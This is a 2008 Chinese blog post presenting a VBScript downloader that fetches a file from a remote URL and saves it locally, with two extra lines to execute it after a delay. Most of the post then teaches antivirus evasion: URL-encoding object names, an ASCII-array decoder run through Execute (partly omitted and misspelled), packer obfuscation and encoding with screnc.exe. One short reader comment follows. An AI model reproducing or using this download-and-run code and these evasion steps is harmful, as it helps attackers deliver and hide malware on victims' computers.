vbsDownloader.vbs & 相关

时间: 2008-06-27 / 分类: 未分类 / 浏览次数: / 0个评论 发表评论

给出一个vbsdownloader.vbs的代码和使用方法:

On Error Resume Next
Dim iRemote,iLocal
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2

这段代码的语法是:vbsdownloader.vbs 文件的远程URL 本地路径(有2个参数)。本脚本的功能是 从远程下载文件保存到本地,不含运行功能。如果要运行的话,请在后面加上2句代码:

wscript.sleep 10000
Shell.Run (iLocal) ‘延迟过后执行下载文件

我不会这么无聊,发个代码,我还要讲下如何免杀这段代码:
首先,URLEncode加密,用unescape解密还原
参考文章:http://hi.baidu.com/biweilun/blog/item/66b89f25d397f56534a80f96.html

第一次加密:
Dim iRemote,iLocal
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = createObject(unescape("%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50"))
xPost.Open unescape("%47%45%54"),iRemote,0
xPost.Send()
Set sGet = createObject(unescape("%41%44%4F%44%42%2E%53%74%72%65%61%6D"))
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2

第二次加密:
rem biweilun
‘ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+|;’,./:"<>?
biweilun=array
(68,105,109,32,
————————————————————–
中间为上述代码的10进制ASCII码集,为了不唆使一些人犯罪,故省略
http://hi.baidu.com/biweilun
—————————————————————
44,50,13,10):for i=1 to UBound(biweilun)
bingdu=bingdu&chr(biweilun(i))
next
Excute bingdu’ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+|;’,./:"<>?

第三次加密:
可以用一些vbs免杀器来完成,火狐的也不错

第四次加密:
p,a,c,k,e,d函数加密,代码请见:
http://hi.baidu.com/biweilun/blog/item/0373e3dd94a404ea77c63865.html

第五次加密:
微软的工具:screnc.exe

语法为:screnc.exe 1.vbs 2.vbe
1.vbs为要免杀的vbs文件   2.vbe为输出文件,后缀一定要用vbe 记住!

vbs的免杀就说这么多了,有问题可以给biweilun留言

您阅读此文共耗时

暂无评论

  1. mxmaple
    2008/06/29 06:47:59

    好像不用这么麻烦吧吧VBS脚本变形一次 就行啦

发表评论

你必须 登录后 才能留言!